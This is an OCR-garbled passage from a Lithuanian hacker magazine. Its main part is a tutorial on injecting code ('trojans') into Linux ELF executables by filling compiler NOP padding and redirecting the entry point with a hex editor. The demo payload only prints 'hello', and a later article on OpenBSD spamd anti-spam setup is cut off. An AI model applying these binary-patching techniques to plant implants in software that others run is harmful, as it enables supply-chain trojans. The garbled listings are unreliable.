dančių nulinių baitų priežastimi. 


[Pirmyn!] Straipsnyje pateikti svarbiausi metodai, kurių tau 
prireiks sudarinėjant shell-kodus. Tačiau jeigu tikiesi sėkmės, 
nepakanka vien tik perskaityti šio straipsnio. Svarbu kiek įma- 
noma giliau suprasti operacinę sistemą, kuriai ruošiesi rašyti 
shell-kodą, bei įvaldyti programavimą su asembleriu. Tikiuo- 
si, čia pateikti pavyzdžiai tave įtikino, kad shell-koduose nė- 
ra nieko ypatingai sudėtingo. Viskas gana paprasta ir logiška. 
Svarbiausia — nebijoti žvilgtelėti į dokumentaciją ir šiek tiek 
paeksperimentuoti. 


JAM NEPAVYKO 
"NULAUŽTI" 
BENDROJO PRIĖMIMO 
KOMISIJOS 
DUOMENŲ BAZĖS!! 


PADĖS ĮSTOTI 
NEPAŽEIDŽIANT 
ĮSTATYMŲ.... 


TT 
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ų įveikimo paslaptys 


P A UŽKROVĘ VYKDOMĄ 
BYLĄ MES PAMATYSIME SKAIČIUS. DAUG 
SKAIČIŲ. GALIMA NUSPAUSTI NULIUKĄ IR 
MĖGAUTIS, KAIP MAŠININIS KODAS IŠ- 
STA DĖL MŪSŲ JĖGOS SPAUDIMO, 

„TAI PERNELYG PAPRASTA IR NEĮDO- 
„GERIAU SUSIKAUPTI IR ĮRAŠYTI KELE- 
TĄ PAPILDOMŲ PRASMINGŲ ASEMBLERIO 
EILUČIŲ! ŠIAME STRAIPSNYJE BUS PASA- 
AMA APIE TAI, KAIP VEIKIA ELF BYLOS, 
KAIP JOS UZKRAUNAMOS Į ATMINTĮ IR KAIP 
HAKERIAI Į JAS ĮTERPIA SAVO IMPLANTUS. 


Trojanų įdiegimas į ELF bylas 
[Įvadas] Įsiveržęs į mūsų gyvenimą Linux tvirtai įsikūrė ope- 
racinių sistemų arenoje, ir vis dažniau su įvairiai 
ikiamuose kompaktiniuose diskuose galima 
temai skirtų programų. Priešingai nei Windows sistemoje 
daugelis Linux skirtų programų nereikalauja įdiegimo ir jas 
galima ramiai kopijuoti iš vieno kompiuterio į kitą, kas lemia 
intensyvų apsikeitimą bylomis. Pameni MS-DOS? Kokie dar 
ten distributyvai! Mūsų karta tuomet šių žodžių apskritai ne- 
buvo girdėjusi! 
Manoma, jog vykdomomis bylomis Linux pasaulyje keičiamasi 
kur kas rečiau, nei Windows sistemoje, kad didžioji linuksistų 
asi išeities tekstus ir po to savaranl 
„ Kur gį ne! Išeities tekstai užima kur kas dau; " 
o modemas ne guminis — tai pirma. Kompiliavimas toli graž 
ne visada baigiasi sėkmingai, o tuomet reikia burti su kom Pilia 
toriumi ir taisyti gamintojų klaidas, kam reikia atitinkamos kva 
lifikacijos tai antra. Galų gale, didelių projektų kompiliavimo 
trukmė dažnai viršija siuntimosi laiką (dešimtys minučių arba 
net valandų) tai trečia. Yra ir daugiau priežasčių, kurių mes 
čia jau nebevardinsim. Svarbu viena — labai daug vartotojų 


mieliau siunčiasi savo operacinei sistemai sukompiliuotas vyk- 
domas bylas. Dažnokai tokios bylos pateikiamos tiesiog oficia- 
lioje gamintojo svetainėje. Dažnai, bet ne visada! 
ir kita problema. Linux programuotojai nesuka galvos dėl 
interaktyvių konfigūratorių ir rimtai piktnaudžiauja „defainais“ 
sąlyginės kompiliacijos direktyvomis (define). Pavyzdžiui, ma 
šinai su vienu procesoriumi sukuriama viena kompiliacija, o 
mašinai su dviem arba keturiais procesoriais — kita. Tokių 
opcijų gali būti labai daug ir oficialioje svetainėje pateikti 
sus kompiliacijų variantus tiesiog nerealu. O kompiliuoti pa: 
čiam tingisi. Dėl to Ir tenka raustis internete, ieškant nepri 
klausomų gamintojų paruoštų kompiliacijų, ir jas siųstis. Tuo 
pačiu iškyla natūrali grėsmė susidurti su virusu, nepageidau 
jamu priedu arba trojanu tokių atvejų jau yra pasitaikę! 
Papildyti išeities tekstus iš tiesų paprasta, tačiau ką daryti, jei- 
gu turi tik vykdomą bylą ir daugiau nieko? Imame hex redaktorių 
r pačiose atsakingiausiose vietose yes pakeičiame no - tegu 
artotojas paskui stebisi! O dar smagiau įdiegti „laikrodinį me- 
hanizmą“., kuris tam tikru metu į ekraną išveda pranešimą su 
Inimu arba atlieka kokį nors veiksmą. Būtent apie tai mes 
ir pakalbėsime. 


[Elfų anatomija ir jų reprodukcijos galimybės] Iš pradžių 
*nix dirbo su daugybe vykdomų bylų formatų, kurie tarpusavy 
je žiauriai konkuravo, tačiau dabar mūšio laukas ištuštėjo, 0 
tarp rūkstančių praėjusių mūšių nuolaužų liko vienintelis ELF, 
kuris Linux ir BSD sistemose tapo de facto standartu. Kai kur 
dar sutinkamas senovinis a.out, tačiau į ji galima nekreipt 
ypatingo dėmesio 

ELF santrumpa šifruojasi kaip Execution £: Linkable Format (Kom 
ponavimo ir Vykdymo Formatas). Jis. žiminingas su Win32 PE, 
todėl jie turi daug bendro. ELF bylos pradžioje yra tarnybi 
antraštė (ELF-header), kuri aprašo pagrindines bylos charakte 
ristikas tipą (vykdymo arba komponavimo), CP architektūrą, 
virtualius įėjimo taško adresus, likusių antraščių dydžius ir po: 
slinkius. 

Už ELF antraštės eina segmentų lentelė (program header t 
Ie), kurioje išvardinami turimi segmentai ir jų atributai. Linki- 
nimo formate ji nėra būtina. Linkeris į segmentus nekreipia 
dėmesio, kadangi jis veikia išskirtinai sekcijų lygyje. O vykdo- 
mas ELF bylas į atmintį užkraunantis sisteminis užkroviklis 
elgiasi priešingai — jis ignoruoja sekcijas ir operuoja ištisais 
segmentais. 
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ELFheader ELFheader 
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header header table, 


ir sisteminio OS užkrovėjo (dešinėje) požiūriu 


Kas yra segmentai ir sekcijos? Segmentas — tai nepertraukia- 
ma adresų erdvės sritis su savo priėjimo atributais. Kodo seg- 
mentas turi vykdymo atributą, 0 duomenų segmentas — skaity- 
mo ir rašymo atributus. Nederėtų ELF segmentų painioti su x86 
procesoriaus segmentais! Apsaugotame 386+ režime tikrąja 
šio žodžio prasme jau nėra jokių „segmentų“, yra tik selektoriai, 
0 visi ELF bylos segmentai užkraunami į ištisinį 4-ių gigabaitų 
x86 segmentą. Priklausomai nuo segmento tipo, atminties išly- 
ginimo dydis gali kisti nuo 4h iki 1000h baitų («86 puslapio 
dydis). Pačioje ELF byloje jie saugomi neišlygintu pavidalu, tvir- 
tai prigludę viens prie kito, dėl to ieškant laisvos erdvės ko nors 
įterpimui kyla didelų problemų. Artimiausias ELF segmentų ana- 
logas — PE sekcijos, tačiau sekcija PE bylose — tai mažiausias 
struktūrinis vienetas, o ELF bylose segmentas gali būti suskai- 
dytas į vieną ar kelis fragmentus — sekcijas. Tipišką kodo seg- 


VIRTUAL ADRESS ALLOCATION 


L OMGG6OGO | Iainuk so 
Itmso 


Ibeso 


Oxc0000000 


Ostin! 


užkrauto vykdomos bylos atvaizdo atminties žemėlapis 


mentą sudaro init (inicializacijos procedūros), .plt (ryšių sekci- 
ja), „text (pagrindinis programos kodas) ir „finit (užbaigimo pro- 
cedūros) sekcijos. Sekcijos reikalingos linkeriui, kompiliavimui, 
kad jis galėtų atrinkti sekcijas su panašiais atributais ir bylos 
kompiliavimo metu optimaliai jas išdėlioti segmentuose, t.y. „su- 
kombinuoti“. Nepaisant to, kad sisteminis užkroviklis ignoruoja 
sekcijų lentelę, vis dėlto linkeris į wykdomą bylą įrašo jos kopiją. 
Tam sunaudojama visiškai nedaug vietos, 0 derintuvams ir di- 
sasembleriams tai labai praverčia. Dėl nevisai suprantamų prie- 
žasčių gdb ir daugelis kitų programų atsisako užkrauti bylą su 
pažeista sekcijų lentele arba be jos, kuo dažnai naudojasi pro- 
sat apsaugos nuo pašalinių įsikišimo. 

ia mes nenagrinėsime tarnybinių antraščių struktūros ir laukų 
paskirties. Tuo užsiims hex redaktorius, o mums šių detalių ne- 
prireiks. Besidomintieji gali žvilgtelėti į bylą /usr/include/elf.h — 
ten viskas išsamiai aprašyta. 
Geriau dėmesį sutelkime ties bylos užkrovimu į atmintį. Pagal 
nutylėjimą ELF antraštė yra adresu 8048000h. Tai ir yra pa- 
grindinis užkrovimo adresas. Linkinimo stadijoje jį laisvai galima 
pakeisti kitu, tačiau daugelis programuotojų jo nekeičia, Visi 
segmentai į atminti projektuojami pagal segmentų lentelėje ap- 
rašytus virtualius adresus, be to, virtuali atvaizdo projekcija vyksta 
nepertraukiamai, o tarp segmentų neturi būti neužpildytų „sky- 
lių“. Pradedant 40000000h adresu sudedamos bendrai nau- 
dojamos bibliotekos (Id-linix.so, libm.so, libc.so ir kitos), kurios 
operacinę sistemą susieja su taikomaja programa. Artimiau- 
sias Windows pasaulio analogas — KERNEL32.DLL, realizuo- 
jantis Win32 API, tačiau jei nori, programa operacinės sistemos 
funkcijas gali iškvietinėti ir tiesiogiai. NT sistemoje už tai atsako 
INT 2Eh pertraukimas, o Linux dažniausiai INT 80h (išsamiau 
apie sisteminių iškvietimų realizacijos skirtumus galima perskai- 
tyti dokumente „UNIX Assembly Codes Development for Vulne- 
rabilities Illustration Purposes“). 
Norint iškviesti, pavyzdžiui, bylos atidarymo funkciją, reikia kreip- 
tis arba į /ibc biblioteką, arba tiesiogiai į pačią operacinę siste- 
mą. Pirmasis variantas yra gremėzdiškiausias, lengviausiai per- 
keliamas ir mažiausiai pastebimas. Antrąjį paprasta realizuoti, 
tačiau po pirmo žvilgsnio | disasembliuotą listingą jis tuojau pat 
krenta į akis (teisingos programos neiškvietinėja INT 80h!), be 
to, jam būdingos suderinamumo problemos su skirtingomis Li- 
nux versijomis. Štai tau ir mokestis už paprastumą! 
Paskutiniame adresų erdvės gigabaite (prasidedantis nuo 
C0000000h adreso ir besitęsiantis iki galo) įrašomi opera- 
cinės sistemos kodas ir duomenys, | kuriuos mes kreipsi- 
mės tik per /NT 80h pertraukimą arba per bendras (shared) 
bibliotekas. 
Stekas yra apatiniuose adresuose. Jis prasideda nuo pagrindi- 
nio užkrovimo adreso ir „auga viršun“ link nuliniu adresų. Dau- 
gelyje linuksų stekas yra vykdomas (t.y. į jį galima perkelti maši- 
ninį koda ir į jį perduoti valdymą), tačiau kai kurie paranojiški 
administratoriai įdiegia pataisymus, kurie nuima stekui vykdy- 
mo atributą, tačiau tokių nedaug, todėl jų galima nepaisyti. 


[Ko mums prireiks?] Vykdomoms byloms taisyti Linux nėra 
būtinas. Pakanka turėti Windows arba net MS-DOS sistemoje 
paleistą HIEW, tačiau tokiu atveju teks kaip reikiant paplušėti, 
be to, kur po to visa tai debuginti? Dėl to Linux yra pageidauti- 
nas dalykas, bent jau emuliatoriaus (/MWare, BOCHS arba OE- 
MU) pavidalu. Mes apsistosime ties hex redaktoriumi HTE, kurį 


nemokamai parsisiųsti iš hte.sf.net (taip pat ir sukom. 
Jis „suvirškina: ormatą, jame yra galingas asem 
eris ir kitų gundančių galimybų. Taip pat yra galimybė pasi 
naudoti BIEW (biew.sf.net) redaktoriumi, tačiau jis kur kas sil- 
»nesnis, Pageidautina turėti IDA. Jos Linux jungtyje yra patogus 
nteraktyvus Turbo Debugger stiliaus derintuvas (debugger) bei 
pats disasembleris. Jeigu tu neturi IDA Pro, čiupk standartinį 
nimo įrankį gab, kuris pateikiamas standartiniame daugelio 
L sistemų komplekte, tačiau jo galimybės smarkiai apribo- 
os. Pavyzdžiui, jis atsisako užkrauti bylas be section table, su- 
lumpa ties antiderinimo triukais ir t.t. Iš dokumentacijos mums 
visų pirma prireiks ELF formato specifikacijos, kurią galima n 
kamai parsisiųsti iš www.cs.princeton.edu/courses/archive/ 
2lI05/c0s318/docs/ELF Format. pdf, ir skirtingose sistemose 
naudojamų sisteminių iškvietimų sąrašo — UNIX Assembly Co 
opment for Vulnerabilities Illustration Purpose 
sd-pl.net/documents/asmcodes- 1.0.2.pdf). 


Svetimo kodo implantavimas į ELF bylas] Implantavimo eks 
derimentuose mums prireiks veikiančios vykdomos bylos, kurią 
es galėsime sukurti savarankiškai, pasinaudodami kompilia: 
r tekstų redaktoriumi. Midnight Commanderyje spau- 
<Shift-F4> ir įvedame kito iš eilės turinio programą 
po to <F2>/"bylos pavadinimas.c" ir sukompi 
iuojame ją su mėgstamiausiu gec, su nustatymais pagal nuty 
ėjimą (gcc bylos pavadi c -o bylos pavadinimas). 

monstracinė programa, | kuria mes įterpsime pašalinį kodą 


žr. listingą) 


printt("LORD Ihe best group in the worl 


vlordi og) Yimonstrs, bondogo and 


ido-masan"), 


Sukurtą bylą užkrauname hex redaktoriuje (./ht-0. 7.5-linux 386 

ylos pavadinimas), 0 po to nuspaudžiame <F6> (mode) ir pa 
nkame elf/image. Redaktorius pereis į vykdomos bylos at 
o vaizdavimo režimą, automatiškai mus perkeldamas į en: 
rypoint žyme pažymėto įėjimo taško apylinkes. Jeigu taip nenu. 
iks, spausk <F5> (goto) ir įvesk entrypoint (be kabučių). Tada 
kranas turėtų atrodyti maždaug taip: (žr. 3 nuotrauką). 


Iemonstracinės programos, į Kurią bus |te nis kodas, si as 


ykdoma byla hex redai 


Prasimankštinimui pabandykime pirmas dvi komandas tiesiog 
sukeisti vietomis: xor ebp, ebp/pop esi į pop esi/kor ebp, ebp. 
žvedame kursorių ant pirmos mašininės komandos (ji yra ad 


resu 80482C2h), spaudžiame <Ctrl-A> (Assemble) ir įvedam 
pop esi. Redaktorius pasiūlys keletą mums leidžiamų pasirinkt 
asembliavimo variantų: 5Eh ir 8Fh C6h. Pasirenkame 5Eh, ka: 
dangi jis yra trumpiausias (8Fh C6h toje vietoje tiesiog netilps), 
po to lygiai taip pat asembliuojame komandą xor ebp, ebp 

Pakeistus baitus redaktorius vaizdžiai išskiria raudona spalva, ke 
vaizdu ir labai gražu, tačiau nuspaudus <F2> (save) 
daro žali, kas patvirtina, jog visi pakeitimai sėkmingai iš 
ELF antraštėje nėra kontrolinių sumų laukų, todėl mum: 
rūpintis Jos perskaičiavimu. Linux neskaičiuoja kontrolinės 
sumos! Jis taip daro todėl, jog buvo projektuojamas išrr 
Juk tai ne Windows! Susidaro įspūdis, kad PE bylas projektavo 
žmonių minia, kuri tarpusavyje sunkiai b Sprę: 
pats: tiek Linux, tiek Windows naudoja derinamo užkrovimo me- 
chanizmą pagal reikalavimą. Atvaizdo puslapiai į atmintį projek- 
tuojami tada ir tik tada, kai į juos kreipiamasi, dėl ko iš karto po 
paleidimo byla paruošta darbui, o visi trūkstami puslapiai už. 
kraunami vėliau (arba iš viso neužkraunami; pavyzdžiui, už spaus- 
dinimą atsakinga programos dalis iš viso nebus užkrauta, je 
nė karto nebus pasirinktas meniu punktas print). Užkrovimo 
cesas lyg ir „išdalinamas“ laike, todėl tavęs neerzina jokie smėlio 
laikrodžiai, kuriuos Windows taip mėgsta rodyti skai 


vėl pasi 
goti 
ikia 


ylos 


ndradarbiai 


IP 06046387 


imontuotu į IDA Pro disa: 


terpiamo kodo derinimas su integruotu derinimo įrankiu mbler 


o 
z 


B 


o 
> 


ant kontrolinę sumą neišvengiamai kreipiamasi į visus pus: 
pius ir visi jie užkraunami į atmintį, net jeigu Ir nėra reikalingi. 
aip išeina, kad mes turime du mechanizmus — vienas užkrovi- 
mą optimizuoja, o kitas „pesimizuoja“, iššvaistydamas visus pri- 
alumus. Kur logika?! 
O štai Linux kūrėjai kontrolinės sumos skaičiavimą pavedė įvedi- 
mo'išvedimo įrenginiams. Be abejo, tai neapdraudžia nuo iškrai- 
dymų. Kietieji diskai kontroliuoja tik fizinius defektus, tačiau ne- 
kreipia dėmesio į loginius iškraipymus (virusus). Nepaisant to, vis 
iek nėra ypatingos prasmės kontrolinę sumą saugoti pačioje by- 
oje. Jeigu virusas galės modifikuoti bylą, jis modifikuos ir kontro- 
inę sumą. Kontrolines sumas reikėtų saugoti atskiroje „apsau- 
e saugykloje“, o jų paskaičiavimu turėtų užsiimti failų siste- 
arba antivirusai. Vis dėlto Linux pasaulyje nėra nei vieno, nei 
to. Tiesa, jie lyg ir yra, tačiau realiai niekur neįdiegti 
Vienintelę problema kelia protektoriai Ir vykdomų bylų pakuoto: 
ai, kurie kontroliuoja savo pačių vientisumą (integrity). Kiekvie 
nais metais jų atsiranda vis daugiau ir daugiau. UPX, shiv'os 
protektoriai... | juos iš pradžių geriau nesigilinti! 
s šiek tiek nukrypom nuo temos. Nuspaudžiam <F10> ir 
einam iš hex redaktoriaus, po ko paleidžiam pataisytą bylą. Ji 
asileidžia, tuo patvirtindama savo darbingumą. Tai reiškia, kad 
difikacija atlikta sėkmingai! 
O dabar užsiimkime rimtesniais dalykais, t.y. pabandykime į pro: 
gramą įterpti realų kodą, kuris daro ką nors naudinga. Iš karto 
škyla klausimas: kur mes įsiterpinėsime? Tarp segmentų lais: 
vietos nėra, tarp sekcijų taip pat. (Teoriškai) galima pra- 
)lesti paskutinį segmentą ir įsiterpti būtent jame, tačiau, Visų 
pirma, tai per daug pastebima, 0 antra — gana sudėtinga. 
bet ne viskas taip blogai, kaip atrodo! Pagal nutylėjimą gcc star- 
inius funkcijų adresus išlygina pagal 10h ribą, o tai reiškia, kad 
mūsų demonstracinėje byloje galima rasti tiesiog daugybę 
aisvos vietos. Vidutiniškai tai yra 10h/2h = 8h baitų kiekvienai 


fikuotos bylos darba 5 komandas vietomis — viskas veikia normaliai 


atas sukelti 


funkcijai, įskaitant ir tarnybines. Čia būtų galima paslepti net i 
mamutą, jeigu tik, be abejo, prieš tai ji sukapotume 
NOP komandų grandinė, kuria „main“ funkcijos pabaigoje pa: 


lieka išlyginimo siekiantis kompiliatorius 


1 main: Are 
! pushet 
8048385 ! mo 
804387 ! sub 
Ša | and 
MOV e04, 
Lsub 


d pir [esp] 


80496, 


The best group: in. Ih 


8048302 nap 


Dar viena skylė — duomenų segmente esantis įvedimo/išvedimo 
buferis, kurio turinys pateikiamas žemiau. Tai ištisi 28 baitai 
kuriuos galima panaudoti savo nuožiūra! Net jeigu byloje nėra 
jokiu akivaizdžių failinių manipuliatorių (kaip, pavyzdžiui, mūsu 
demonstracinėje programoje), toks buferis vis tiek bus sukurtas 
programos kompiliavimo metu, kaip yra ir mūsų atveju. 


ių segmente Išsaugotos STDIN butis 
04840 db 00h 
804844 db 00h 
801844 
10 stdin used 
d 0 
804846 db. 00h 
804846 db. 021 
8048446 d. 00h 


Telieka nuspręsti, kaip valdymą perduoti į įtemptą kodą. Tai rea- 
lizuoti galima skirtingais būdais: pakoreguoti įėjimo tašką (HTE 
tai moka) arba į jo apylinkes įterpti specialų įmp. Būtent taip 
mes ir pasielgsim! Paleidžiame redaktorių, pereiname į įėjimo 


tašką ir jį labai atidžiai apžiūrime: 


Įėjimo taškas ir jo apylinkės 
| entypoint 
op si 
80482d Lor ebp, ebp 
804826 ! mov e0, 657 
804826 | and esp, Ofiioh 
804826 ! push e0x 
804820 I push osp 
801820 | push 
804826 I nush libe cu fin 
8048240 ! pusl 
8048245 ! push ca 
80482d6 | push asi 
804827 ! push main 
804826! all w 


Įibe csu ini 


9430 8048200 


Kodėl gi mums pop esi/xor ebp, ebp nepakeitus į „jmp į mūsų 
kodą“, iš kur mes galėsime daryti viską, ką tik sumanysim, įwyk: 
dyti šias komandas ir grįžti atgal? Vis dėlto iš pradžių reikia pa- 
ruošti įterpiamą kodą. Paprastumo dėlei į ekraną išvesime trum. 
pasveikinimą. Asemblerio kalboje tai skamba maždaug taip: 


gramos tekstas 


krana pasveikinimą 
eu, 4 
bi, 1 


edančios Į 


sisteminis iškvietimas wit 


pranešimo sinboj 
paskutinį švedimo pranešimo simbal 


gin. msg 
end msg ; rod 
ekaną 

mondos Išsaugojimas 


3; gim 


rogramų 
0 


Tai ne pats geriausias variantas, jį galima kaip reikiant optimi- 
zuoti, pavyzdžiui, taip: 


Jptimizuotas variantas 
AO 60X, 60X 


dd al, 4 


203h 


Dabar hex redaktoriuje prasukant bylą reikia surasti ir užra- 
šyti startinius visų įterpimui tinkamų NOP'ų grandinių adre- 
sus. O kokios grandinės tinka įterpimui? Jeigu dvi kaimyni- 
nės grandinės yra trumpo perėjimo pasiekiamumo ribose 
grubiai šnekant, šimto baitų ribose), kuo puikiausiai pa- 


kaks 3x NOP'ų (2 baitai perėjimo komandai, vienas — bet 
okiam naudingam vieno baito kodui, pavyzdžiui, inc ebx 


arba pop esi). Priešingu atveju mums reikia turėti mažiau- 
ai šešių NOP'ų grandinę, kur penki baitai bus skirti artimo 
perėjimo komandai ir vienas — naudingai komandai. Mūsų 
atveju gaunasi štai kas 


10 baitų 
14 baitų 
12 


Gauname 36 baitus. Visiškai tinkama vieta demonstracinei pro- 
mai! Pradėsime NOP'ų grandinių užpildymą naudingu kodu. 
š pirmo bandymo gauname: 


16 31 (0 xor GX, 60X 
8 I6 04 04 add al, 4 
1 69 93 00 00 00 įmp 8 


3090 


Tuo pačiu prarandamas paskutinis NOP baitas, tačiau kitaip čia 
neišsisuksi. Komanda xor ebx, ebx užima du baitus ir čia r 
telpa. O ką, jeigu mes sukeistume komandas vietomis? T.y 
al, 4 perkelti į kitą iš eilės NOP grandinę, o vietoje xor ebx, ebx 
inc ebx įterpti 


8048306 31d0 xor 60X, 60X 
8048308 3ldb xor abx, 6bx 
8048300 inc bi 
804830b 69 92 00 00 00 įmp 8 


Tuomet tolimesnė grandinė bus užpildyta taip 


| paskutinę trečią NOP'ų grandinę likęs kodas jau nebeteipe 
1eužtenka vieno vienintelio baito! Ką gi, pabandysime mūs: 
kodą dar šiek tiek suspausti. Pavyzdžiui, vietoje poros i 
cijų mov edx, ecx/add edx, sizeofimsg), kurios užima 
tus, galima panaudoti /ea edx, [ecx+size0f(msg)]. Tac 
kas telpa! Patį pranešimą galima įrašyti duomenų segmen 
te. Kadangi laisvos vietos ten nėra labai daug, apsiribosime 
eilute hello. Pabaigoje įterpti užbaigianti nulį nėra būtina 
kadangi sisteminis iškvietimas write išveda lygiai tiek simbo 


a vis 


ių, kiek jam pasakyta išvesti, ir į jokius „sustojimo“ ženklus 
Jis nereaguoja. 
Jeigu viskas būtų padaryta teisingai (kas mažai tikėtina, kadan 


gi klaidų pirmą kartą daro visi), mūsų byla pergalingai išves eilu 
tę hello, o po jos ir mūsų bandomosios programos išved 


eilutę, tuomet ekranas atrodys štai taip: 


4 


[Išvados] Mes aptarėme paprasčiausią atvejį. o vargome prie 
jo kiauras dvi valandas. Tai kiek gi truks pilnavertės prc 


mos trojanizavimas? Visą likusį gyvenimą? Žinoma Taip 
ilgai užtrukome tik todėl, kad esame neįpratę, 0 kai atsiran- 


da įgūdžiai, viskas atliekama automatiškai. Svarb) 
nebijoti sunkumų ir nuolat treniruotis, tobulinti savo meist 
riškumą 


ausia — 


pakeisti baitai Išskiriami rauc 


Vykdomos bylos modifikavimas su Ate rediaktorium) 
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„Spamd“ — slaptas 


atsakomasis smūgis 

Viskas kovai prieš spamą! 

KIEKVIENĄ DIENĄ Į PADORIŲ VARTOTOJŲ 
PAŠTO DĖŽUTES PATENKA VIS DAUGIAU IR 
DAUGIAU NEPAGEIDAUJAMŲ REKLAMINIŲ 
PRANESIMŲ (UCE — UNSOLICITED 
COMMERCIAL EMAIL), PAPRASČIAU 
SNEKANT — SPAMO. ATITINKAMAI 
ELEKTRONINIO PAŠTO PERŽIŪRAI TENKA 
SUGAIŠTI VIS DAUGIAU JĖGŲ IR BRANGAUS 
LAIKO. TAIP PAT AUGA TIKIMYBĖ, KAD 
PRALEISI AR ATSITIKTINAI IŠTRINSI SVARBŲ 
LAIŠKĄ. O DABAR PRIE VISO ŠITO PRIDĖK 
PAPILDOMĄ PASTO SERVERIŲ IR 
INTERNETO KANALŲ APKROVIMĄ, IR GAUSI 
PROBLEMĄ, KURI VERTA PATIES 
RIMČIAUSIO DĖMESIO. ŠIANDIEN MES 
PARODYSIM, KAIP GALIMA NE TIK 
SEKMINGAI PASIPRIESINTI SPAMERIAMS, 
BET IR SUDUOTI JIEMS TRIUSKINANTĮ 
ATSAKOMĄJĮ SMŪGĮ. 


[Panacėjos beieškant] Dar spamo atsiradimo aušroje 
buvo suformuoti taip vadinami operatyvūs „juodųjų 
skylių“ sąrašai (RBL — Realtime Blackhole List), į 
kuriuos buvo įtraukti kai kurių interneto paslaugų tiekėjų 
modemų pool'ų ir atvirų serverių (open relays) IP 
adresai, iš kurių buvo masiškai siuntinėjama 
nepageidaujama reklaminė korespondencija. Pašto 
transporto agentų (sendmail, gmail, postfix, exim) 
kūrėjai nepavargdavo nuo versijos prie versijos savo 
kūriniuose tobulinti specialių kovos su spamu 
priemonių. Kartu su tuo buvo išradinėjamos įvairios 
euristinės sistemos, filtravimo metodai ir genetiniai 
algoritmai, kurie buvo skirti pašto grūdams atskirti nuo 
pelų. 

Tačiau nepaisant daugybės pasiūlytų sprendimų, 
panacėja taip ir nebuvo surasta. Gauti priimtiną 
rezultatą buvo galima tik derinant įvairius apsaugos 
būdus (o kai kuriais atvejais net panaudojant 
workaround'us, kas elektroninio pašto sistemoms yra 
tiesiog nepriimtina). Tiesa, tas „priimtinas rezultatas“ 
tenkindavo toli gražu ne visus. Čia sudėtingumas tame, 
kad spamo platinimo technologijos nestovi vietoje, 
jos evoliucionuoja kartu su apsaugos sistemomis. 


Spameriai nuolat tobulina savo žinias, plečia naudojamų 
priemonių arsenalą ir neįtikėtinai lengvai prisiderina prie 
naujausių „vakcinų“. Kaip mes visi jau spėjom įsitikinti, 
spamas be didesniu trikdžių praeina pro RBL serverių 
grandines, už borto palieka SpamAssassin + razor + DCC 
kinkinį, į akligatvį įstumia MDA/MUA filtrus. 

Atkaklioje spamo ir antispamo dvikovoje laimėtoju praktiškai 
visada tapdavo spameriai, ir sunku pasakyti, kiek dar jie būtų 
triumfavę, jeigu į areną nebūtų išėjęs spamd(8) — feikinis SMTP 
demonas su greylisting darbo režimo galimybe. 


[Pirmasis žvilgsnis į „spamd“] Pats savaime spama neturi to 
specifinio funkcionalumo, kuris būdingas pilnavertiškiems MTA, 
todėl savarankiškai duoti atkirčio spameriams negali. Unikalios 
spamd galimybės atsiskleidžia tik pastarajam glaudžiai 
sąveikaujant su paketų filtru pr(4). 

pf + spamd darbo schema gali būti pavaizduota taip: demonas 
klausosi grįžtamojo ryšio sąsajos (127.0.0.1) 8025/tcp jungties; 
kas tam tikrą sukonfigūruotą laiko tarpą įrankis spamdsetup(8) 
operuoja hešuota spamerių IP adresų duomenų baze: IP adresų 
sąrašai | atitinkamas lenteles ir ugniasienės taisyklės užkraunami 
veikimo metu, panaudojant pfct/(8). Remdamiesi gautais 
duomenimis ir priklausomai nuo prisijungusio SMTP serverio IP 
adreso, mes galime: 

* įeinantųį SMTP prisijungimą nukreipti sama demonui, kuris 
nenutrauks susijungimo, kaip būtų galima tikėtis, bet priešingai, 
stengsis maksimaliai ilgai išlaikyti spamerį „linijoje“: 


table <spand> pesis! 


tdr pass on Sext if inet pioto tep om < spamd-> to port smip ) 


-> 12700.1 port spond 


* leisii praeiti teisėtiens paketams: 

block in 

pass in log on Sex II inet proto tep from any to Sex II V 
pot smip Alags S/SA kegp state 


Galiausiai spamas nėra pristatomas (svarbu pastebėti, kad 
užbaigus spamd <—> MTA susijungimą, reklaminiai laiškai bus 
grąžinti į siuntėjo pašto eilę), mūsų serverio apkrovimas praktiškai 
nepadidės, o prisijungusio spameriško serverio, kuris vienu metu 
apdoroja šimtus susijungimų, laikas ir sisteminiai resursai bus 
eikvojami bergždžiai. Galima pasakyti, kad spamd vykdo labai 
subtilią DoS ataką, tuo pačiu nė per nago juodymą 
neatitrūkdamas nuo pašto sistemas dokumentuojančių RFC. 
Taip taip, idealiu atveju, jeigu visi pašto serveriai būtų aprūpinti 
tokia apsauga, spameriams būtų prasti popieriai. 


Kai kurie SMTP klaidų kodai, po kurių siuntėjas yra priverstas 
pakartoti laiško siuntimą: 


450 Reguested mail adion not taken: mailbox unaveilable (E-g., mailbox busy) 
451 Raguested aciion chortad: local error in processing 
550 Reguested action not taken: mailboc unavailable (E., mailbox not found, na access) 


[Nuo teorijos prie praktikos] Demono konfigūravimą derėtų 
pradėti nuo spamd.conf(5) pataisymų. „all“ direktyvoje nurodome 
užknisančių spamerių iš draugiškų tolimųjų rytų šalių adresus 
(be abejo, galima įjungti spamhaus ir spews sekcijų išvardinimus, 
tačiau tada būk pasiruošęs tam, kad vieną gražų rytą tu nustosi 
gauti laiškus iš tokių domenų, kaip centras.lt, delfi.lt, mail.ru ir 
tt): 


+ V /etŲspamd.conf 


ali 
china:korea: 


chinaĄ 
black) 
są — "SPAM, You address Oh appeuis to bo fom ChineNiN 
See www.akean.con/asianspamblocks.htm! for mere detail“ A, 
method = htipA. 
dle =www.openbsd.org/spamd/chinacidr.bxt.gz: 


koregA, 
sblacki, 
msą = "SPAM. Your address Vol appears to be fiom KoreoviN, 
Sez wwvi.okean.con/asianspamblocks.htm! for more detail“ A 
:melhod-=htipA. 
Ailę —ww.openbsd.org/spamd)/koreacidi.Ixt.g2: 


Raktinis žodis black parodo, kad šie adresai priklauso 
juodiesiems sąrašams (black lists), msg nurodo siuntėjo SMTP 
serveriui grąžinamą klaidos pranešimą, o method ir file aprašo 
su gzip(1) suspaustos tekstinės bylos su spamerių IP adresais 
gavimo būdą. Toliau su crontab(1) iškviečiame tekstų redaktorių 
(tą, kuris nurodytas su aplinkos kintamuoju $EDITOR), kad 
periodiškai (kas valandą) atnaujintų adresų bazes: 


> Gontab 0 

0 Ę ž Ę Ausu/libexou/spomdso1up 
Dabar šiek tiek atitrūkime nuo konfigūravimo proceso Ir savo 
dėmesį sutelkime į greylisting režimą. 


[„Greylisting“ magija] Kova su spamu gali vykti dviem frontais: 
serverio pusėje arba kliento pusėje. Versti klientą atlikinėti 
kažkokius jam magiškus veiksmus — tai šventvagystė :), 0 
serverio pusėje be tradicinių juodųjų sąrašų egzistuoja du skirtingi 
metodai: tiesioginė korespondencijos analizė, kuomet pagal 
